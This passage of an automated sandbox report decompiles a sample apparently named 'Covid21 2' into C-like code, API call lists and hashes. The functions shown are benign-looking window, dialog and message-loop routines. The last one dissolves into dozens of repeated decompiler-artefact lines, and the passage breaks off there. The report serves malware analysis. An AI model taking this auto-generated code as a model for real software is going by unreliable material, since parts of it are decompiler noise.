                                  • PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                  • GetCursorPos.USER32(-00000008), ref: 0040538F
                                  • LoadImageA.USER32(00000000,00007F86,00000002,00000000,00000000,00008040), ref: 004053A4
                                  • SetCursor.USER32(00000000), ref: 004053AB
                                  • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 004053E7
                                  • SendMessageA.USER32(?,00000214,?,00000010), ref: 0040540A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: System$Metrics$Window$Message$Send$CursorLongRect$CaptureImageInfoLoadParametersPointsPostState
                                  • String ID:
                                  • API String ID: 985555588-0
                                  • Opcode ID: e10282ce0e36e189d93c3964f5e1b1cc79817ceec6a3e6fcf446dd530336dc79
                                  • Instruction ID: 586f9979426b920aefc07ff19cb97ca9c93cebbcd8dc2859b64a59a748dbd016
                                  • Opcode Fuzzy Hash: e10282ce0e36e189d93c3964f5e1b1cc79817ceec6a3e6fcf446dd530336dc79
                                  • Instruction Fuzzy Hash: ADC1A271A00A06BFDB10AF64CD48ABB7B75FB04340F50453BF905A66D0D779A8A1CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00404B03(void* __edx, void* __eflags, struct HWND__** _a4, int _a8, signed int _a12, int _a16, int _a20, CHAR* _a24, long _a28, struct HWND__* _a32) {
                                  				struct tagRECT _v20;
                                  				long _v24;
                                  				struct _WNDCLASSA _v64;
                                  				char _v320;
                                  				struct HWND__** _t107;
                                  				struct HINSTANCE__* _t112;
                                  				intOrPtr _t113;
                                  				intOrPtr _t114;
                                  				struct HWND__* _t130;
                                  				struct HWND__* _t136;
                                  				struct HWND__* _t142;
                                  				struct HWND__** _t143;
                                  				struct HWND__* _t146;
                                  				signed int _t157;
                                  				int _t158;
                                  				int _t161;
                                  				signed int _t165;
                                  				signed int _t166;
                                  				long _t167;
                                  				void* _t175;
                                  				int _t177;
                                  				struct HWND__** _t182;
                                  
                                  				_t175 = __edx;
                                  				_v24 = 1;
                                  				_t107 = E0040662C( *0x40b474, _a4);
                                  				_t182 = _t107;
                                  				if(_a4 != 0xffffffff) {
                                  					L3:
                                  					_push(_a4);
                                  					L4:
                                  					sprintf( &_v320, "WindowClass_%d");
                                  					if(_a24 == 0) {
                                  						_a24 = 0x409000;
                                  					}
                                  					memset( &_v64, 0, 0x28);
                                  					_t112 =  *0x40b140; // 0x400000
                                  					_v64.hInstance = _t112;
                                  					_t113 =  *0x40b47c; // 0xb028d
                                  					_v64.hIcon = _t113;
                                  					_t114 =  *0x40b480; // 0x10003
                                  					_v64.hCursor = _t114;
                                  					_v64.lpszClassName =  &_v320;
                                  					_v64.style = 8;
                                  					_v64.lpfnWndProc = 0x405b1f;
                                  					_v64.cbWndExtra = 0;
                                  					_v64.hbrBackground = 0x10;
                                  					RegisterClassA( &_v64);
                                  					_t165 = _a28;
                                  					if((_t165 & 0x00000008) != 0) {
                                  						_v24 = 0;
                                  					}
                                  					_t166 = _t165 & 0xfffffff7;
                                  					if((_t166 & 0xeffffffc) == 0) {
                                  						_t166 = _t166 | 0x00c00000;
                                  					}
                                  					if((_t166 & 0x10000000) == 0) {
                                  						_a28 = 1;
                                  					} else {
                                  						_t166 = _t166 & 0xefffffff;
                                  						_a28 = 0;
                                  					}
                                  					_v20.right = _a16;
                                  					_v20.bottom = _a20;
                                  					_v20.left = 0;
                                  					_v20.top = 0;
                                  					AdjustWindowRect( &_v20, _t166 & 0xfffffffc, 0);
                                  					_t177 = _a8;
                                  					_a16 = _v20.right - _v20.left;
                                  					_a20 = _v20.bottom - _v20.top;
                                  					if(_t177 == 0xffff0001 || _a12 == 0xffff0001) {
                                  						if((_t166 & 0x00000003) == 0) {
                                  							_t177 = 0x80000000;
                                  							_a12 = 0x80000000;
                                  						}
                                  					}
                                  					if((_t166 & 0x00000001) == 0) {
                                  						if((_t166 & 0x00000002) == 0) {
                                  							goto L30;
                                  						}
                                  						_t146 = _a32;
                                  						if(_t146 != 0) {
                                  							L26:
                                  							GetWindowRect(_t146,  &_v20);
                                  							asm("cdq");
                                  							_t177 = (_v20.right - _v20.left - _a16 - _t175 >> 1) + _v20.left;
                                  							asm("cdq");
                                  							_t157 = (_v20.bottom - _v20.top - _a20 - _t175 >> 1) + _v20.top;
                                  							_a12 = _t157;
                                  							if(_t177 < 0) {
                                  								_t177 = 0;
                                  							}
                                  							if(_t157 < 0) {
                                  								_a12 = _a12 & 0x00000000;
                                  							}
                                  							goto L30;
                                  						}
                                  						_t146 = GetActiveWindow();
                                  						if(_t146 == 0) {
                                  							goto L30;
                                  						}
                                  						goto L26;
                                  					} else {
                                  						_t158 = GetSystemMetrics(0);
                                  						if(_a16 > _t158) {
                                  							_a16 = _t158;
                                  						}
                                  						asm("cdq");
                                  						_t177 = _t158 - _a16 - _t175 >> 1;
                                  						_t161 = GetSystemMetrics(1);
                                  						if(_a20 > _t161) {
                                  							_a20 = _t161;
                                  						}
                                  						asm("cdq");
                                  						_a12 = _t161 - _a20 - _t175 >> 1;
                                  						L30:
                                  						_t167 = _t166 & 0xfffffffc;
                                  						_t130 = CreateWindowExA(0,  &_v320, _a24, _t167, _t177, _a12, _a16, _a20, _a32, 0,  *0x40b140, 0);
                                  						 *_t182 = _t130;
                                  						if(_t130 == 0) {
                                  							UnregisterClassA( &_v320,  *0x40b140);
                                  							E004066BB( *0x40b474, _a4);
                                  							return 0;
                                  						}
                                  						SetPropA(_t130, "PB_WindowID",  &(_a4[0]));
                                  						if(_a28 != 0) {
                                  							if((_t167 & 0x01000000) == 0) {
                                  								if((_t167 & 0x20000000) == 0) {
                                  									_push(1);
                                  								} else {
                                  									_push(2);
                                  								}
                                  							} else {
                                  								_push(3);
                                  							}
                                  							ShowWindow( *_t182, ??);
                                  						}
                                  						asm("sbb ebx, ebx");
                                  						_t182[0xb] =  ~( ~(_t167 & 0x21000000));
                                  						_t182[4] = 2;
                                  						_t136 = RtlAllocateHeap( *0x40b13c, 0, 0xc);
                                  						_t182[1] = _t136;
                                  						_t136->i = 9;
                                  						 *((short*)(_t182[1] + 4)) = 0xfa01;
                                  						 *(_t182[1]) = 3;
                                  						 *((short*)(_t182[1] + 8)) = 9;
                                  						 *((short*)(_t182[1] + 0xa)) = 0xfa02;
                                  						 *((char*)(_t182[1] + 6)) = 7;
                                  						_t142 = CreateAcceleratorTableA(_t182[1], _t182[4]);
                                  						_t182[5] = _t182[5] | 0xffffffff;
                                  						_t182[2] = _t142;
                                  						_t182[7] = 0;
                                  						if(_v24 != 0) {
                                  							_push( *_t182);
                                  							E00407EE3();
                                  						}
                                  						_t143 = _a4;
                                  						if(_t143 == _t182) {
                                  							return _t143;
                                  						} else {
                                  							return  *_t182;
                                  						}
                                  					}
                                  				}
                                  				_a4 = _t182;
                                  				if(_t182 != 0xffffffff) {
                                  					goto L3;
                                  				} else {
                                  					_push(_t107);
                                  					goto L4;
                                  				}
                                  			}


























                                  APIs
                                  • sprintf.MSVCRT ref: 00404B46
                                  • memset.MSVCRT ref: 00404B63
                                  • RegisterClassA.USER32(00000000), ref: 00404BA8
                                  • AdjustWindowRect.USER32(?,00000010,00000000), ref: 00404C01
                                  • GetSystemMetrics.USER32(00000000), ref: 00404C3E
                                  • GetSystemMetrics.USER32(00000001), ref: 00404C58
                                  • GetActiveWindow.USER32 ref: 00404C7F
                                  • GetWindowRect.USER32(?,?), ref: 00404C8E
                                  • CreateWindowExA.USER32(00000000,?,?,00000010,00000000,?,00000001,00000000,?,00000000,00000000), ref: 00404CEF
                                  • SetPropA.USER32(00000000,PB_WindowID,00000100), ref: 00404D0C
                                  • ShowWindow.USER32(00000000,00000001,?,?,?,?,?,00000000), ref: 00404D33
                                  • RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00404D58
                                  • CreateAcceleratorTableA.USER32(?,?,?,?,?,?,?,00000000), ref: 00404D95
                                  • UnregisterClassA.USER32(?), ref: 00404DC9
                                    • Part of subcall function 004066BB: memset.MSVCRT ref: 004066D8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Window$ClassCreateMetricsRectSystemmemset$AcceleratorActiveAdjustAllocateHeapPropRegisterShowTableUnregistersprintf
                                  • String ID: PB_WindowID$WindowClass_%d
                                  • API String ID: 1820370190-2937193648
                                  • Opcode ID: df5e665b80dd526419b541482955163d8fd811b305854d5719021b4815e158c8
                                  • Instruction ID: c7ce8232fcfdd9da0e6d01810650b6905c309b16ddaece5cc0acf35632e3a176
                                  • Opcode Fuzzy Hash: df5e665b80dd526419b541482955163d8fd811b305854d5719021b4815e158c8
                                  • Instruction Fuzzy Hash: 49A17BB190020ADFDB10CF68D989B9EBBF4FF44344F14862AF955A32A0D778D950CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00404925(void* __edi, void* __eflags, intOrPtr _a4) {
                                  				char _v260;
                                  				int* _t11;
                                  				struct HWND__* _t12;
                                  				struct HWND__* _t15;
                                  				void* _t21;
                                  				void* _t29;
                                  				int* _t32;
                                  				void* _t33;
                                  
                                  				_t29 = __edi;
                                  				_t11 = E00406690( *0x40b474, _a4);
                                  				_t32 = _t11;
                                  				if(_t32 != 0) {
                                  					_t12 = GetWindow( *_t32, 4);
                                  					if(_t12 != 0 && _t32[7] == 0) {
                                  						SetActiveWindow(_t12);
                                  					}
                                  					_push(_t29);
                                  					RemovePropA( *_t32, "PB_WindowID");
                                  					if(RemovePropA( *_t32, "PB_DropAccept") != 0) {
                                  						 *0x40a894( *_t32);
                                  					}
                                  					_t15 = _t32[7];
                                  					if(_t15 == 0) {
                                  						 *0x40a79c( *_t32);
                                  						sprintf( &_v260, "WindowClass_%d", _a4);
                                  						UnregisterClassA( &_v260,  *0x40b140);
                                  					} else {
                                  						SendMessageA(_t15, 0x221,  *_t32, 0);
                                  					}
                                  					_t21 = _t32[1];
                                  					if(_t21 != 0) {
                                  						HeapFree( *0x40b13c, 0, _t21);
                                  						DestroyAcceleratorTable(_t32[2]);
                                  					}
                                  					_t33 = _t32[6];
                                  					if(_t33 != 0) {
                                  						DeleteObject(_t33);
                                  					}
                                  					return E004066BB( *0x40b474, _a4);
                                  				}
                                  				return _t11;
                                  			}












                                  APIs
                                  • GetWindow.USER32(00000000,00000004), ref: 0040494B
                                  • SetActiveWindow.USER32(00000000), ref: 0040495C
                                  • RemovePropA.USER32(00000000,PB_WindowID), ref: 00404970
                                  • RemovePropA.USER32(00000000,PB_DropAccept), ref: 00404979
                                  • RevokeDragDrop.OLE32(00000000), ref: 00404982
                                  • SendMessageA.USER32(?,00000221,00000000,00000000), ref: 00404999
                                  • sprintf.MSVCRT ref: 004049B8
                                  • UnregisterClassA.USER32(?), ref: 004049CD
                                  • HeapFree.KERNEL32(00000000,?), ref: 004049E3
                                  • DestroyAcceleratorTable.USER32(?), ref: 004049EC
                                  • DeleteObject.GDI32(?), ref: 004049FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: PropRemoveWindow$AcceleratorActiveClassDeleteDestroyDragDropFreeHeapMessageObjectRevokeSendTableUnregistersprintf
                                  • String ID: PB_DropAccept$PB_WindowID$WindowClass_%d
                                  • API String ID: 192457453-976223216
                                  • Opcode ID: b276470ce38247df909007b1919a474eca168de931713324b91e1c49e89625a6
                                  • Instruction ID: f0b996a718386a9457227e303234a4a67d6852f77ee41d513e9fa1cdc6f7bee2
                                  • Opcode Fuzzy Hash: b276470ce38247df909007b1919a474eca168de931713324b91e1c49e89625a6
                                  • Instruction Fuzzy Hash: 38214C71500304EBDB226F61DD09F57BBB9EB44740F148436BA81B21A4C77AD8619B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E004036F8(void* __ecx, void* __esi, intOrPtr _a4, _Unknown_base(*)()* _a8, intOrPtr _a12) {
                                  				struct HINSTANCE__* _v8;
                                  				char* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				void _v40;
                                  				int _v41;
                                  				char _v300;
                                  				struct HINSTANCE__* _t35;
                                  				int _t41;
                                  				_Unknown_base(*)()* _t51;
                                  				char* _t56;
                                  				int* _t57;
                                  				int _t59;
                                  				void* _t61;
                                  				void* _t65;
                                  				char* _t68;
                                  				void* _t69;
                                  				void* _t73;
                                  
                                  				_t65 = __esi;
                                  				_t61 = __ecx;
                                  				_t59 = 0;
                                  				_t73 =  *0x40b204 - _t59; // 0x0
                                  				if(_t73 == 0) {
                                  					 *0x40b204 = 1;
                                  					 *0x40a88c(0);
                                  				}
                                  				memset( &_v40, _t59, 0x20);
                                  				_t35 = LoadLibraryA("SHELL32.DLL");
                                  				_v8 = _t35;
                                  				if(_t35 == _t59) {
                                  					L12:
                                  					 *(E00407750(0x104, _a12)) = 0;
                                  					L13:
                                  					return E004077F0(0x104 - _t59);
                                  				}
                                  				if(_a8 == _t59) {
                                  					_a8 = 0x409000;
                                  				}
                                  				strncpy( &_v300, _a8, 0x103);
                                  				_v41 = _t59;
                                  				_t41 = strlen( &_v300);
                                  				if(_t41 > 3) {
                                  					_t57 = _t69 + _t41 - 0x129;
                                  					if( *_t57 == 0x5c) {
                                  						 *_t57 = _t59;
                                  					}
                                  				}
                                  				_a8 = GetProcAddress(_v8, "SHBrowseForFolder");
                                  				_v28 = _a4;
                                  				_v40 = E0040390D(_t61);
                                  				_v24 = 0x40;
                                  				_v20 = E004036D1;
                                  				_v16 =  &_v300;
                                  				E004038B5(1);
                                  				_a8 = _a8( &_v40, _t65);
                                  				E004038B5(0);
                                  				if(_a8 != _t59) {
                                  					_t51 = GetProcAddress(_v8, "SHGetPathFromIDList");
                                  					_t68 = E00407750(0x104, _a12);
                                  					 *_t68 = 0;
                                  					 *_t51(_a8, _t68);
                                  					 *0x40a890(_a8);
                                  					_t59 = strlen(_t68);
                                  					_t56 =  &(_t68[_t59]);
                                  					if( *((char*)(_t56 - 1)) != 0x5c) {
                                  						 *_t56 = 0x5c;
                                  						_t56[1] = 0;
                                  						_t59 = _t59 + 1;
                                  					}
                                  				}
                                  				FreeLibrary(_v8);
                                  				if(_t59 != 0) {
                                  					goto L13;
                                  				} else {
                                  					goto L12;
                                  				}
                                  			}























                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 00403718
                                  • memset.MSVCRT ref: 00403725
                                  • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000), ref: 00403732
                                  • strncpy.MSVCRT ref: 00403763
                                  • strlen.MSVCRT ref: 00403772
                                  • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0040379C
                                  • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 004037EB
                                  • strlen.MSVCRT ref: 0040380D
                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00403829
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: AddressLibraryProcstrlen$FreeInitializeLoadmemsetstrncpy
                                  • String ID: @$SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                  • API String ID: 4028521140-1801489780
                                  • Opcode ID: 07aa67b6d2d60c29585954675d6b4e4e6dedb6c4a4368b4edd8143cc4fd8dddb
                                  • Instruction ID: ea8c443e7643bfdbcdfbd2f4adfdb3851681cb8806fbf168f8689d10ea387318
                                  • Opcode Fuzzy Hash: 07aa67b6d2d60c29585954675d6b4e4e6dedb6c4a4368b4edd8143cc4fd8dddb
                                  • Instruction Fuzzy Hash: 35418F71800208AFDB11AFA5CC45ADE7FB8AF05315F0080BAF554B7292D7B99E14CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00404F24(long _a4) {
                                  				struct tagMSG _v32;
                                  				void* _t35;
                                  				void* _t36;
                                  				void* _t40;
                                  				long _t45;
                                  				void* _t57;
                                  				struct HWND__* _t61;
                                  				void* _t63;
                                  				void* _t69;
                                  
                                  				_t69 = E0040642D( *0x40b478);
                                  				_t35 =  *(_t69 + 0x54);
                                  				if(_t35 == 0) {
                                  					L4:
                                  					_t36 =  *(_t69 + 0x18);
                                  					 *(_t69 + 8) =  *(_t69 + 8) | 0xffffffff;
                                  					if(_t36 == 0) {
                                  						if(_a4 == 0xffffffff) {
                                  							GetMessageA( &_v32, 0, 0, 0);
                                  							L15:
                                  							_t61 = GetActiveWindow();
                                  							_t40 = E00405D3C(_t63, _t61);
                                  							if(_t40 == 0) {
                                  								L17:
                                  								TranslateMessage( &_v32);
                                  								DispatchMessageA( &_v32);
                                  								L18:
                                  								_t45 =  *((intOrPtr*)(_t69 + 0xc));
                                  								if(_t45 == 0) {
                                  									_a4 = _v32.message;
                                  									 *((intOrPtr*)(_t69 + 0x10)) = _v32.wParam;
                                  									 *((intOrPtr*)(_t69 + 0x14)) = _v32.lParam;
                                  								} else {
                                  									_a4 = _t45;
                                  									 *((intOrPtr*)(_t69 + 0xc)) = 0;
                                  								}
                                  								L21:
                                  								return _a4;
                                  							}
                                  							_push( &_v32);
                                  							_push(_t40);
                                  							_push(_t61);
                                  							if( *0x40a820() != 0) {
                                  								goto L18;
                                  							}
                                  							goto L17;
                                  						}
                                  						if(PeekMessageA( &_v32, 0, 0, 0, 3) != 0) {
                                  							goto L15;
                                  						}
                                  						if(_a4 != 0) {
                                  							if(MsgWaitForMultipleObjects(0, 0, 0, _a4, 0x1ff) == 0x102) {
                                  								goto L10;
                                  							}
                                  							if(PeekMessageA( &_v32, 0, 0, 0, 3) != 0) {
                                  								goto L15;
                                  							}
                                  						}
                                  						L10:
                                  						return 0;
                                  					}
                                  					_a4 =  *(_t36 + 4);
                                  					 *((intOrPtr*)(_t69 + 4)) =  *((intOrPtr*)(_t36 + 8));
                                  					 *((intOrPtr*)(_t69 + 0xc)) = 0;
                                  					 *(_t69 + 0x18) =  *_t36;
                                  					HeapFree( *0x40b13c, 0, _t36);
                                  					if( *(_t69 + 0x18) == 0) {
                                  						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
                                  					}
                                  					goto L21;
                                  				}
                                  				_t57 =  *(_t35 + 0x14);
                                  				if(_t57 != 0) {
                                  					HeapFree( *0x40b13c, 0, _t57);
                                  				}
                                  				HeapFree( *0x40b13c, 0,  *(_t69 + 0x54));
                                  				 *(_t69 + 0x54) = 0;
                                  				goto L4;
                                  			}













                                  APIs
                                  • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,BDFINOPS,00000000,NOPS,OPS,00000000,00000000,00000000), ref: 00404F58
                                  • HeapFree.KERNEL32(00000000,?,?,?,00000000,BDFINOPS,00000000,NOPS,OPS,00000000,00000000,00000000), ref: 00404F64
                                  • HeapFree.KERNEL32(00000000,?,?,?,00000000,BDFINOPS,00000000,NOPS,OPS,00000000,00000000,00000000), ref: 00404F90
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FB8
                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,000000FF,000001FF), ref: 00404FD5
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FEB
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404FF7
                                  • GetActiveWindow.USER32 ref: 00404FFD
                                  • TranslateAccelerator.USER32(00000000,00000000,?), ref: 00405015
                                  • TranslateMessage.USER32(?), ref: 00405023
                                  • DispatchMessageA.USER32(?), ref: 0040502D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Message$FreeHeap$PeekTranslate$AcceleratorActiveDispatchMultipleObjectsWaitWindow
                                  • String ID:
                                  • API String ID: 1286715895-0
                                  • Opcode ID: a9216ed72947d2e8546aa282aeab8c230ae6b6ec53debb515884c6e6a5cbfe9e
                                  • Instruction ID: 6edb0f9935199db0e56a2c8fe76ef196a0bcbb4c32eec9ba7cc802ce8dc129a4
                                  • Opcode Fuzzy Hash: a9216ed72947d2e8546aa282aeab8c230ae6b6ec53debb515884c6e6a5cbfe9e
                                  • Instruction Fuzzy Hash: 6C414CB1900705AFCB20DF65DD88C6BBBF8EB85740710853AF556E62A0D338D941CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E00407EE3(struct HWND__* _a4, intOrPtr _a96) {
                                  				void* _v3;
                                  				void* _v5;
                                  				struct HWND__* _v8;
                                  				signed int _v48;
                                  				char _v60;
                                  				void _t68;
                                  				signed int _t69;
                                  				void* _t79;
                                  				void* _t80;
                                  				void* _t87;
                                  				struct HWND__* _t88;
                                  				struct HWND__* _t89;
                                  				void* _t90;
                                  				signed char _t95;
                                  				void* _t96;
                                  				signed int* _t97;
                                  				void* _t104;
                                  				void* _t106;
                                  				struct HWND__** _t107;
                                  				signed int _t108;
                                  				signed int _t114;
                                  				void* _t117;
                                  				signed int* _t134;
                                  				signed int _t136;
                                  				signed int _t137;
                                  				void* _t138;
                                  				signed char _t140;
                                  				signed int _t142;
                                  				signed int _t148;
                                  				signed int _t157;
                                  				signed int _t158;
                                  
                                  				_t107 = E0040642D( *0x40b470);
                                  				if(_t107[4] != 0) {
                                  					_t68 =  *(_t107[3]);
                                  				} else {
                                  					_t68 =  *_t107;
                                  				}
                                  				_t88 = _a4;
                                  				_v8 = _t68;
                                  				if(_t88 != 0) {
                                  					_push(_t96);
                                  					sprintf( &_v60, "PB_GadgetStack_%i",  *0x40b140);
                                  					_t114 = _t114 + 0xc;
                                  					if(_v8 != 0) {
                                  						_t87 = GetPropA(_v8,  &_v60);
                                  						 *(_t87 + 4) =  *_t107;
                                  						 *(_t87 + 8) = _t107[3];
                                  						 *(_t87 + 0xc) = _t107[4];
                                  						 *(_t87 + 0x10) = _t107[5];
                                  						_t107[3] = _t107[3] & 0x00000000;
                                  					}
                                  					_t104 = GetPropA(_t88,  &_v60);
                                  					_t89 = 0;
                                  					if(_t104 == 0) {
                                  						if(_t107[3] != 0) {
                                  							_t107[4] = 0;
                                  						} else {
                                  							_t79 = RtlAllocateHeap( *0x40b13c, 8, 0x28);
                                  							_t107[4] = _t107[4] & 0x00000000;
                                  							_t107[3] = _t79;
                                  							_t107[5] = 0xa;
                                  						}
                                  						 *_t107 = _t88;
                                  						_t106 = RtlAllocateHeap( *0x40b13c, 8, 0x18);
                                  						 *_t106 = _t88;
                                  						SetPropA(_t88,  &_v60, _t106);
                                  						 *((intOrPtr*)(_t106 + 0x14)) = SetWindowLongA(_t88, 0xfffffffc, E00407E1A);
                                  					} else {
                                  						_t80 = _t107[3];
                                  						if(_t80 != 0) {
                                  							HeapFree( *0x40b13c, 0, _t80);
                                  						}
                                  						 *_t107 =  *(_t104 + 4);
                                  						_t107[3] =  *(_t104 + 8);
                                  						_t107[4] =  *(_t104 + 0xc);
                                  						_t107[5] =  *(_t104 + 0x10);
                                  						 *(_t104 + 8) =  *(_t104 + 8) & 0x00000000;
                                  					}
                                  					_t107[1] = _t107[1] & 0x00000000;
                                  					_pop(_t96);
                                  				}
                                  				_t69 = _v8;
                                  				_pop(_t108);
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
                                  				 *_t69 =  *_t69 + _t69;
